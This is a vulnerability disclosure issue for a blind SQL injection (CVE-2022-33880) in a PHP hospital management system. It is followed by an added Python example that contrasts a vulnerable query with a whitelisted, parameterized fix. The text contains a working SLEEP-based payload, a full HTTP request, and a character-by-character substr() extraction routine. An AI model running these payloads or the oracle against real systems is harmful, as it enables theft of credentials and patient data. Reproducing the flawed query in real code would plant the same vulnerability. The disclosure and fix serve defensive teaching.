CVE-2022-33880: Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page · Issue #7 · projectworldsofficial/hospital-management-system-in-php
hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter.
Hi
I found a SQL injection vulnerability in your hospital management system.
Page Request:
POST /hospital/hms-staff.php HTTP/1.1
Host: 192.168.0.107
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
Connection: close
email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr() method or using the sqlmap tool.
Affected URL: http://127.0.0.1/hms-staff.php
Affected Parameter: type
Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-
Mitigation:
- Performing Whitelist Input Validation
- Use of Prepared Statements (with Parameterized Queries)
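The pattern the report describes, as an added example that is not part of the original issue or of the project's PHP code: a Python/sqlite3 stand-in for the login query with the flawed version, the whitelist-plus-prepared-statement fix from the mitigation list, and the substr() extraction the reporter mentions. It assumes, from the payload shape (`admin WHERE 1=1 ...`), that `type` is interpolated as the table name; the issue does not show the code, so the query, the table names and the rows are constructed here. sqlite has no SLEEP(), so the injected condition is used as a boolean oracle (row returned or not) instead of a time delay.

```python
import sqlite3
import string

# Whitelist mapping the accepted 'type' values to table names (assumed names,
# not the project's real schema).
ALLOWED_TYPES = {"admin": "admin", "doctor": "doctor"}

# Characters tried by the boolean oracle; enough for the constructed secret.
CHARSET = string.ascii_lowercase + string.digits + "@."


def make_db():
    """Constructed in-memory stand-in for the application's user tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, email TEXT, password TEXT)")
    conn.execute("CREATE TABLE doctor (id INTEGER, email TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin@example.com', 'secret')")
    conn.commit()
    return conn


def login_vulnerable(conn, email, password, user_type):
    """Assumed shape of the flawed query: every parameter, including the
    'type' that selects the table, is pasted straight into the SQL text.
    (Plain-text password comparison is kept only to focus on the injection.)"""
    sql = (f"SELECT id FROM {user_type} "
           f"WHERE email='{email}' AND password='{password}'")
    return conn.execute(sql).fetchall()


def login_hardened(conn, email, password, user_type):
    """The fix from the report: whitelist the identifier, bind the values."""
    table = ALLOWED_TYPES.get(user_type)
    if table is None:
        raise ValueError("rejected account type")
    # Identifiers cannot be bound as parameters, hence the whitelist above;
    # the values are passed as bind parameters and never touch the SQL text.
    sql = f"SELECT id FROM {table} WHERE email=? AND password=?"
    return conn.execute(sql, (email, password)).fetchall()


def is_allowed_type(user_type):
    """Whitelist check on its own, so the decision can be tested directly."""
    return user_type in ALLOWED_TYPES


def dump_via_boolean_oracle(conn, subquery, max_len=32):
    """What the report means by dumping data with substr(): the injected
    condition is either true (a row comes back) or false (no row), and one
    character of the subquery's result is recovered per position."""
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in CHARSET:
            payload = (f"admin WHERE 1=1 AND "
                       f"substr(({subquery}),{pos},1)='{ch}' -- -")
            if login_vulnerable(conn, "username", "password", payload):
                hit = ch
                break
        if hit is None:
            break  # past the end of the value: substr() returns ''
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_db()
    # The reporter's payload shape: the credential check is commented out.
    print(login_vulnerable(db, "username", "password", "admin WHERE 1=1 -- -"))
    print(dump_via_boolean_oracle(db, "SELECT password FROM admin WHERE id=1"))
    print(login_hardened(db, "admin@example.com", "secret", "admin"))
```

With the injected `type`, the vulnerable query becomes `SELECT id FROM admin WHERE 1=1 -- - WHERE email='username' AND password='password'`, so the comment swallows the credential check and the oracle can read any value a subquery can reach. The hardened version never lets the request pick a table name that is not in the map, and the two values go through bind parameters.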